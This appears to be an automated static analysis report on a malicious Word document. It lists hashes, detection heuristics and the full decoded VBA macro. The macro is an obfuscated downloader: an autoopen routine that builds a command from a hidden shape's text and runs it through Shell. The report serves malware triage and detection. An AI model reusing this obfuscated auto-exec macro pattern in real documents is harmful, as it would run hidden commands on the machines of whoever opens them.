Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9c6e5c676fc8b0cd…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 136.6 KB
Created: 2018-12-10 15:21:00
Authoring application: Microsoft Office Word
First seen: 2019-08-04
MD5: 6bf1ab7c13f862a219a25d087067e886
SHA-1: a271a8e23700a93ac520dfe18492e3a254e5ac28
SHA-256: 9c6e5c676fc8b0cdbee3678f45cdbcdef1ee7c5f507b119a63bef97e6b99f607
Risk Score: 252

Malware Insights

MITRE ATT&CK: T1059.005 (Command and Scripting Interpreter: Visual Basic)

The sample contains a VBA macro with an autoopen subroutine that invokes cmd.exe with obfuscated arguments. This suggests an attempt to download and execute a secondary payload. The presence of a Shell() call and suspicious cmd.exe invocation points to a malicious downloader.

Heuristics (9)

  • ClamAV: Doc.Malware.Dldk-6779378-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Malware.Dldk-6779378-0
  • VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]
    Document contains VBA macro code
  • Potential Shell call in VBA [critical, OLE_VBA_SHELL]
    Potential Shell call in VBA
    Matched lines in script:
    . _
    Shell(TuVsYWzGVb, mBazcr), jiqpK)
        FznbikbSkGiwYhaFEmIlJw = JThRwjNCcTJEwtXijWNiC / Tan(197755194) * 272893850 / Tan(302319952) + pHZOrJfISiIBTdl - Cos(152461652) + (25668951 / Int(cOddMjDcPvOffd))
  • VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]
    The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only macro documents, and documents where source extraction failed, in which the visible source is unavailable.
  • AutoOpen macro [low, OLE_VBA_AUTOOPEN]
    AutoOpen macro
    Matched lines in script:
    Attribute VB_Customizable = True
    Sub autoopen()
    pjbmZm
  • Suspicious cmd.exe invocation with execution flag [high, SC_STR_CMD]
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML schema namespace URI found in ordinary Office documents, not a network indicator.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5467 bytes
SHA-256: 01abdc3ae30b8c53713174f73c90f89fa625a6d995064acbf4532e1551747706
Detection (ClamAV): No threats found
Obfuscation or payload: likely
142 of 181 identifiers look randomly generated (e.g. 'risziEmwEdpWGcMlVGowvorv'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "sCJtiKrzIX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
pjbmZm
End Sub

Attribute VB_Name = "cXQwOdwwjbnIMD"
Function pjbmZm()
On Error Resume Next
    UaOKwSDtNXWcmPinKlhHdR = sRhnkkYbqhXnWbGioDIHcWEr / Tan(189679605) * 38879204 / Tan(121208645) + fvoJDiWtRfTIpw - Cos(210039272) + (306837440 / Int(cHMECtDVJTWMqKiST))
Set vtOjrFNQJkzSfqKczzGAcBkn = KzhbUoqVAkBAtPGrlkSVqnf
NKjMTTtIaphFfp = wJzfFIcGhzIqRRRDWTfOKH
    FLOumcGJRqENCRRXOKVRihw = KciAzNNjHvDawrOw / Tan(155682666) * 206048898 / Tan(89998048) + tBOklbkmYDMXODj - Cos(61838601) + (303240094 / Int(JEcUGGOqbWwXuDT))
Set QJOwOXcbLEifMtIFERVJdZv = WuANpBJJEXmauvs
bAJBYjihOrSdhKNrNHbTXO = JvYboGiKIYjicPujnPSzw
    JuHtsDKsrtXzSzcOsROjFRR = flwdfJzMLMwCECpfqPIWK / Tan(320210200) * 80341525 / Tan(331692690) + wrOdGpsdaNHGhNhtKlFw - Cos(170558094) + (65780704 / Int(biqpIvWjYwAjRljFWGZipi))
Set ICbczKGzDmBmuPAjiDi = IjdQIbjjsAfAtJhmhSXYS
zwPzopWWqbLAQcYKUXiXHCGA = khOCPfFPKjhAJnqMWJEpttF
    kIoNVLnPFkFCnDG = jHnJPtQlEzZHAFGj / Tan(61905209) * 300175983 / Tan(175003799) + DOiUdQGjOlEhzXBwOZtrsCI - Cos(144444533) + (252237224 / Int(OziWttdPJScTjwmjXSvs))
Set cEJUjAjwAFIhwCGE = sKEiOjTutuEMfpauXlvUBJt
QIMTljwjbiaknbOUqZqFfmV = inZQLkriRKRGXzIJw
    CtiKEJCFSfCRTuzaOvvFsbj = CzVqvJsUfAikcOlZIozrWnmH / Tan(11659955) * 168072936 / Tan(27189649) + LbAaKkIEoMKJmimSMPzzJWz - Cos(26988345) + (200581333 / Int(bPMNoVFwJEAIZrGhkvioEoB))
Set vlbEkodwvSJsraYoDo = hREqFtclCZqnmOtSCtB
UaEMGiNpKWqkQPTB = vWKIDaWFfWiwIWuCbEHNrjX
    HjkILwwZfmXhMjCbuZNkoE = HSLwiUlZXTXEIOEmfXDPBca / Tan(260357123) * 5005420 / Tan(32187363) + UzzlwCmdpAzOEuN - Cos(334850) + (98074211 / Int(iuNqmhMlprirYzdOQbZhYB))
Set kOmjJwVncLzWKrdLQZ = NuwzbBkqdlahPcZc
zBCnTECfZbTWmQJHLoa = QLiZIrCBijukPBLOXatqwS
    StOjVJzcYqCaMOKJWEi = XMfoIiNvVEnSPEt / Tan(186443041) * 56803514 / Tan(51823574) + KYlrwjEMcJHAXzLBGNZX - Cos(286734865) + (318102284 / Int(GUCjLIViBOZTim))
Set hIERllNDQTECnOikmO = iXvwsEHbGlzjdPljRS
LQsRmQHFiTSinFLHzlL = MdKGRSnanChRRMCF
    fOlLKzVzzGpCEhtV = vkYLmwUahzcDUqMQXmRApB / Tan(178708063) * 216696216 / Tan(44355982) + lldVjLhdNXowtSRldz - Cos(297872966) + (313384101 / Int(PdlhucUwuJrEPLizLSQW))
Set cocYtwjEXbnLrVIromjMfT = zudHjnSjcYomoJIB
luWhDtYpZFXjhKLJaiiP = zQFuLmCiThflFbkzjuAERJh
Set QTqVRZE = sCJtiKrzIX.Shapes(zqLoWcic + "qjuljvLMNkR" + ABphi).TextFrame
    hPzDGQOVDbiwIF = FabpETukIAJlapKoYXmkA / Tan(29916536) * 7034727 / Tan(20648151) + zaoBHWkIIMmwJpkm - Cos(208508364) + (273558546 / Int(zfojsnFZWVkAZY))
Set FsGiAiYdRcXpPhBzUOwF = LuvOBzNmXMMafksfwpXZ
XDVzqrVXQlaTzt = LUwhKqtQKPjwJRXZbffnrZQL
    VQwKbwiviBqocuthvMb = uQMPLMWYbqbaFqTfTDQl / Tan(187879928) * 67597035 / Tan(218989918) + wfQUGjlEsMjEEhwOaK - Cos(128845655) + (291650313 / Int(PjmbONsvqBkjqRjwBRv))
Set WitJPbmEBKRqovi = dtrSsICKwUNPSSYsXnDhpdMn
nufjtuuikSIZdMOfjNu = WljlZTBsAGAhErFO
    wAkPimDDdRbhRw = jpwHTptwEzfOwa / Tan(163893644) * 29111877 / Tan(11217345) + wjciLqzEvfqjncrzC - Cos(204494982) + (49559982 / Int(HMECfSwYFdEMZPSOb))
Set iHHPuOIVJDWwXtwjKlfaDtra = SadKYJcXEAzKrSqtKIvBGFKQ
EjjAvkQjQcnfKltubTszZS = phslwZsMQNUTdsWJQj
TuVsYWzGVb = QTqVRZE.ContainingRange + znRGG + crpOKd + iGvMF + HalGiq + mcSbl + IAFPzv + RUKEPhE + JPPmSQk + YENvisz + FpzIzdN + vBVWhSmS
    SDoOtQfqBTHiMW = kjWdzMGrmkvILqVoowEzSikr / Tan(37968811) * 274778523 / Tan(208410044) + HrKoohKLrFzsMMBdwHTzffT - Cos(224157839) + (53440172 / Int(dBvfXJjNjuaGTijJwiz))
Set lGjGtwWjNcYcjPDI = LhpLzcGDrnpTWikkw
WUpmZnAzGVwaEaXtkAHAmi = CBKjMquorkcjnaYICLz
    sonuvXqIDwbHVLImrXGOkG = AnoWuQbsBBFrfXwKRwAlwJ / Tan(130654799) * 318940529 / Tan(36883308) + JOrhLDmznGGBvrb - Cos(42667981) + (167758932 / Int(PUdOtNpSjUqqTsQ))
Set HNBUqBEfkrDQAIJskOjkcv = irtTRJwnOkHkOFFPOQ
iBJZRbLzGFLfMMrXcwhmWnEp = tYumiwSUiQTUScsFLphC
    ItNcwfTzrwPsahUYBtG = bIUdUCDlOwsKkvijkYZ / Tan(163408844) * 225888682 / Tan(211396052) + univREjovunzAZkHwciktEF - Cos(52193143) + (206182777 / Int(ondThrvOZpmGlj))
Set KwQwvdGAQdwzvApiaPNQs = bMvEmzuUprBCjHoL
ahmMqlrzOkGMqXQpzVEAq = GGvnFwsQitPjniGzkbDFXPn
Const mBazcr = 0
    NaLojEihBHNGPkOdNuh = QGEsWfaJVCimoudrcBB / Tan(56101338) * 3696776 / Tan(340086287) + BrhpWLDTAcVJHWSREdUMwZa - Cos(121351399) + (138964236 / Int(WAMtYbQMCBpqDwR))
Set hKSkVVJjwifnvbQOUPpCH = EusvTRcOaWuPrQA
lArdwuvdQakaWoJPcaGYs = BsHiDJsjkAOjdoLdKJw
    NIzTMiuCvpFcsbpBOBOPql = WZqXrXuYusiqpScNz / Tan(8071505) * 41931194 / Tan(110243293) + loDmDRbldCzbsauVG - Cos(20495157) + (200586655 / Int(QKkNkzjloPOjUz))
Set kmlnGSnRpfOzrhsswbPza = pBEiqzOoPHtpKjV
YjdtuiVBsDwWQIFAL = zjjYcqCAQHEBXJXiDjVj
fCpmB = Array(YHBtifllf, GmquROzqj, whEZiiVp, Interaction _
. _
Shell(TuVsYWzGVb, mBazcr), jiqpK)
    FznbikbSkGiwYhaFEmIlJw = JThRwjNCcTJEwtXijWNiC / Tan(197755194) * 272893850 / Tan(302319952) + pHZOrJfISiIBTdl - Cos(152461652) + (25668951 / Int(cOddMjDcPvOffd))
Set KIZnokKiviPPhMscKwcMfd = vtKOuktnziOIUMjP
SkhzwRVPWTDjCRHhz = udWQuCrPlTEYPbiKuvvM
    sFQERumnZMNHEqtqm = WzYJMTWNIpjwWq / Tan(12220826) * 185269109 / Tan(199253618) + VjOYCjSQwdPhTlO - Cos(196934794) + (101243300 / Int(risziEmwEdpWGcMlVGowvorv))
Set tzaVzhsbDkvOYzKlFf = acXnVhQIpQCDrzcpGMbGvz
CrQXzIiNqJCUrVJEojZDKAj = RvIDZiYtdhUvFKT
End Function